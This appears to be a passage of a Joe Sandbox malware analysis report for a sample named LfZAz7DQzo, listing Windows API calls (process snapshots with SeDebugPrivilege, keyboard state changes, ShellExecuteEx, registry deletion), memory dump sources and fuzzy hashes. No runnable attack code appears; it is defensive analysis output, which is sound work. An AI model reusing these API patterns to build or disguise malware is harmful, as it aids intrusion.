                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 2533919879-2896544425
                                        • Opcode ID: 7aa78aab5e240e71f83c4269571631aa4fcd5f5ee8c0f7a521aa9b5ecaa88754
                                        • Instruction ID: df4deeed874a65b5c4c5d29a094734289ec4756dfe1e9b5b3a0265da059581f4
                                        • Opcode Fuzzy Hash: 7aa78aab5e240e71f83c4269571631aa4fcd5f5ee8c0f7a521aa9b5ecaa88754
                                        • Instruction Fuzzy Hash: DF41BD712002049FDB24EF24CC95F7EB7E1AF80714F189459FA46AB3D2DB75A805CB92
                                        APIs
                                        • LoadIconW.USER32(00000000,00007F03), ref: 00EE32C5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: IconLoad
                                        • String ID: blank$info$question$stop$warning
                                        • API String ID: 2457776203-404129466
                                        • Opcode ID: 4b5d67796ac8dffed2866b531ded0c1b5b64f4496b00878360f770a1e8b1d85e
                                        • Instruction ID: e9c40a3c2435b96a2a9c19717544262a1bd4cc96831520e89aff55018be3a03e
                                        • Opcode Fuzzy Hash: 4b5d67796ac8dffed2866b531ded0c1b5b64f4496b00878360f770a1e8b1d85e
                                        • Instruction Fuzzy Hash: DB112B316093CEBAD7015A77DC46CABB3DCDF1D374F20102AFA40B7191D665EB4055A6
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00EE454E
                                        • LoadStringW.USER32(00000000), ref: 00EE4555
                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00EE456B
                                        • LoadStringW.USER32(00000000), ref: 00EE4572
                                        • _wprintf.LIBCMT ref: 00EE4598
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EE45B6
                                        Strings
                                        • %s (%d) : ==> %s: %s %s, xrefs: 00EE4593
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message_wprintf
                                        • String ID: %s (%d) : ==> %s: %s %s
                                        • API String ID: 3648134473-3128320259
                                        • Opcode ID: 6aa036a2f97a98e01e08f383e9b3eeb94e75e1d2523cf1847d57fefc6d027a10
                                        • Instruction ID: 3817c887d65899398ca6ceabd1fbd5e33c3f380249710500d72d49bbd2fd6f21
                                        • Opcode Fuzzy Hash: 6aa036a2f97a98e01e08f383e9b3eeb94e75e1d2523cf1847d57fefc6d027a10
                                        • Instruction Fuzzy Hash: A70162F290020CBFE720E7A0DD89EE7776CE708301F4005A5BB45E2051EA759E899B71
                                        APIs
                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EBC417,00000004,00000000,00000000,00000000), ref: 00E82ACF
                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00EBC417,00000004,00000000,00000000,00000000,000000FF), ref: 00E82B17
                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00EBC417,00000004,00000000,00000000,00000000), ref: 00EBC46A
                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EBC417,00000004,00000000,00000000,00000000), ref: 00EBC4D6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ShowWindow
                                        • String ID:
                                        • API String ID: 1268545403-0
                                        • Opcode ID: 12428009f0147b89f7847d5eb87fcbec29bf612e3e595e579b0ccb3beddff3f7
                                        • Instruction ID: f99618c648183ee913494fd7f6ab0db29e1d3ea2db9ac1d29c76f09bd6992b5b
                                        • Opcode Fuzzy Hash: 12428009f0147b89f7847d5eb87fcbec29bf612e3e595e579b0ccb3beddff3f7
                                        • Instruction Fuzzy Hash: F4416E34208680AEC73DAB28CC9C7FB7B92FF46308F24A45DE25FB6560C6359845E711
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00EE737F
                                          • Part of subcall function 00EA0FF6: std::exception::exception.LIBCMT ref: 00EA102C
                                          • Part of subcall function 00EA0FF6: __CxxThrowException@8.LIBCMT ref: 00EA1041
                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00EE73B6
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00EE73D2
                                        • _memmove.LIBCMT ref: 00EE7420
                                        • _memmove.LIBCMT ref: 00EE743D
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00EE744C
                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00EE7461
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EE7480
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 256516436-0
                                        • Opcode ID: de9c6f39d636a05abd952740614ea8b1a9dbfb31dac55779798abefc9dee79fa
                                        • Instruction ID: 94f9bf6507f94a94ecfe879b00c76af07791c876b2f8915a9ee8a113e6cdd320
                                        • Opcode Fuzzy Hash: de9c6f39d636a05abd952740614ea8b1a9dbfb31dac55779798abefc9dee79fa
                                        • Instruction Fuzzy Hash: 7B316F35A04209EBCF10EF65DC85AAF7BB8FF49710F1441B5F904AB246DB70AA14DBA0
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 00F0645A
                                        • GetDC.USER32(00000000), ref: 00F06462
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F0646D
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00F06479
                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00F064B5
                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F064C6
                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F09299,?,?,000000FF,00000000,?,000000FF,?), ref: 00F06500
                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F06520
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                        • String ID:
                                        • API String ID: 3864802216-0
                                        • Opcode ID: 69a684c0df1fffd839283876f3debb63bcec771fbdd10ce0570317f153f7fedd
                                        • Instruction ID: 97694251d8803bed6d64d40b41fc87b6eaa340661c1e85cf2480904e6ec8f006
                                        • Opcode Fuzzy Hash: 69a684c0df1fffd839283876f3debb63bcec771fbdd10ce0570317f153f7fedd
                                        • Instruction Fuzzy Hash: 3B318D72200214BFEB208F10CC4AFEA3FA9FF09765F044065FE08DA191C6759851EB60
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: be5e2f0141571e68db77ebdec3a7026ec37c7060fec27aab163dcb1d703768dc
                                        • Instruction ID: 81b50d76c846a32c2cf5b91f6a027fe182bf2ef528d567b4096d38dd7bd19f40
                                        • Opcode Fuzzy Hash: be5e2f0141571e68db77ebdec3a7026ec37c7060fec27aab163dcb1d703768dc
                                        • Instruction Fuzzy Hash: 4F21F871601216B7D250A5609C42FEF37ACDF553E8F282012FE05F6382EB11ED22D2E6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7550cf2730d167051d263980edf4d6277b73ee75d247864687206876d2f3953a
                                        • Instruction ID: 33ce8d94d4751ac8bf51125fdd9593531322c87935ce3965f7278cce5c1281a1
                                        • Opcode Fuzzy Hash: 7550cf2730d167051d263980edf4d6277b73ee75d247864687206876d2f3953a
                                        • Instruction Fuzzy Hash: 56717E30900119EFCB14DF98CC49AFEBBB9FF85314F148199F919BA251C730AA52DBA0
                                        APIs
                                        • IsWindow.USER32(01162A70), ref: 00F0B6A5
                                        • IsWindowEnabled.USER32(01162A70), ref: 00F0B6B1
                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00F0B795
                                        • SendMessageW.USER32(01162A70,000000B0,?,?), ref: 00F0B7CC
                                        • IsDlgButtonChecked.USER32(?,?), ref: 00F0B809
                                        • GetWindowLongW.USER32(01162A70,000000EC), ref: 00F0B82B
                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F0B843
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                        • String ID:
                                        • API String ID: 4072528602-0
                                        • Opcode ID: d75d325884746cdbb2ab5d103045357824a04e962dd540b3a6e910e8ed4d033b
                                        • Instruction ID: e32a6c6c38577452bc7e223a773e0c84e8bf13a519aabd9ed1e55063ff362aa5
                                        • Opcode Fuzzy Hash: d75d325884746cdbb2ab5d103045357824a04e962dd540b3a6e910e8ed4d033b
                                        • Instruction Fuzzy Hash: 34719F34A00204AFDB30DF64C8A4FAA7BB9FF4A320F1440A9E955973E1C732A941FB51
                                        APIs
                                        • _memset.LIBCMT ref: 00EFF75C
                                        • _memset.LIBCMT ref: 00EFF825
                                        • ShellExecuteExW.SHELL32(?), ref: 00EFF86A
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                          • Part of subcall function 00E9FEC6: _wcscpy.LIBCMT ref: 00E9FEE9
                                        • GetProcessId.KERNEL32(00000000), ref: 00EFF8E1
                                        • CloseHandle.KERNEL32(00000000), ref: 00EFF910
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                        • String ID: @
                                        • API String ID: 3522835683-2766056989
                                        • Opcode ID: 4a5f56520ec844fd4c4374196eaa0c13f618bd14407cdc819c3922cca139a371
                                        • Instruction ID: 9f2ac01190b3635b8ce4baf1eee8ae308b2f91bf6a5420d10442931cd724e406
                                        • Opcode Fuzzy Hash: 4a5f56520ec844fd4c4374196eaa0c13f618bd14407cdc819c3922cca139a371
                                        • Instruction Fuzzy Hash: 97618B75E006199FCF18EFA4C4819AEBBF5FF48314B149469E95ABB351CB30AD41CB90
                                        APIs
                                        • GetParent.USER32(?), ref: 00EE149C
                                        • GetKeyboardState.USER32(?), ref: 00EE14B1
                                        • SetKeyboardState.USER32(?), ref: 00EE1512
                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00EE1540
                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00EE155F
                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00EE15A5
                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00EE15C8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: f537f0cdbb1da6bf395adc59f19c474fdf4f143f71ab0efd2728aa2a63a87d9b
                                        • Instruction ID: c5f39be1baadc59dcc25796d1f0a2cf8bd561dd4c8cdfec94f1ff80ad4523612
                                        • Opcode Fuzzy Hash: f537f0cdbb1da6bf395adc59f19c474fdf4f143f71ab0efd2728aa2a63a87d9b
                                        • Instruction Fuzzy Hash: D951D2B06046DA3EFB3646268C45BBABEA96B46308F0C55C9E1D6658C2D3A49CC8D750
                                        APIs
                                        • GetParent.USER32(00000000), ref: 00EE12B5
                                        • GetKeyboardState.USER32(?), ref: 00EE12CA
                                        • SetKeyboardState.USER32(?), ref: 00EE132B
                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00EE1357
                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00EE1374
                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00EE13B8
                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00EE13D9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: a652f67fc09a1e9d9b2746eda419efb6bfc930785b0dac52598b692e32120611
                                        • Instruction ID: 8d13c3107d430de1d2a61648f9ed36c5654dfc6c3a21ef07e8a47de4bf99fdb6
                                        • Opcode Fuzzy Hash: a652f67fc09a1e9d9b2746eda419efb6bfc930785b0dac52598b692e32120611
                                        • Instruction Fuzzy Hash: 3851E4B05046D93DFB3282268C45BBA7FA96B06308F0895C9E1D466CC2D3A5ACD8E751
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _wcsncpy$LocalTime
                                        • String ID:
                                        • API String ID: 2945705084-0
                                        • Opcode ID: f218631082d63529aad1a4743aff71c8d24dcce349a75ef2149d9f3deba71e6e
                                        • Instruction ID: 34ab70ef647425f51b921aace18306a5bb4a6d5192dc59b04da59992e6993a41
                                        • Opcode Fuzzy Hash: f218631082d63529aad1a4743aff71c8d24dcce349a75ef2149d9f3deba71e6e
                                        • Instruction Fuzzy Hash: 4D41C4A6C2011876CB11EBB58C86ACFB7E89F0A310F50A866F518F7122E734E754C7A5
                                        APIs
                                          • Part of subcall function 00EE48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EE38D3,?), ref: 00EE48C7
                                          • Part of subcall function 00EE48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EE38D3,?), ref: 00EE48E0
                                        • lstrcmpiW.KERNEL32(?,?), ref: 00EE38F3
                                        • _wcscmp.LIBCMT ref: 00EE390F
                                        • MoveFileW.KERNEL32(?,?), ref: 00EE3927
                                        • _wcscat.LIBCMT ref: 00EE396F
                                        • SHFileOperationW.SHELL32(?), ref: 00EE39DB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 1377345388-1173974218
                                        • Opcode ID: 54452c6f528e8b405324b14fcb46c87cf7b69a4418ca91e7da824259c7b0bc01
                                        • Instruction ID: a720bb4dcd62a706b5427ce149fecd8b697d631557dbe80e0ff3265442625142
                                        • Opcode Fuzzy Hash: 54452c6f528e8b405324b14fcb46c87cf7b69a4418ca91e7da824259c7b0bc01
                                        • Instruction Fuzzy Hash: A441B1B25083889EC751EF75C4859DFB7E8AF89340F10282EF489E3192EB75D688C752
                                        APIs
                                        • _memset.LIBCMT ref: 00F07519
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F075C0
                                        • IsMenu.USER32(?), ref: 00F075D8
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F07620
                                        • DrawMenuBar.USER32 ref: 00F07633
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                        • String ID: 0
                                        • API String ID: 3866635326-4108050209
                                        • Opcode ID: 7479bbdcdc340c5009d04d07236418417133978726db14a255a6dec689605cde
                                        • Instruction ID: 77e1d664c5cef2e8ed62cd326f3c32f2f8cc80902f5fdcb70325fc4faf54d0f5
                                        • Opcode Fuzzy Hash: 7479bbdcdc340c5009d04d07236418417133978726db14a255a6dec689605cde
                                        • Instruction Fuzzy Hash: 12412875E04708AFDB20EF54D984AAABBF8FB09324F048069E91697290D731AD54EF90
                                        APIs
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F0125C
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F01286
                                        • FreeLibrary.KERNEL32(00000000), ref: 00F0133D
                                          • Part of subcall function 00F0122D: RegCloseKey.ADVAPI32(?), ref: 00F012A3
                                          • Part of subcall function 00F0122D: FreeLibrary.KERNEL32(?), ref: 00F012F5
                                          • Part of subcall function 00F0122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F01318
                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F012E0
                                        Memory Dump Source
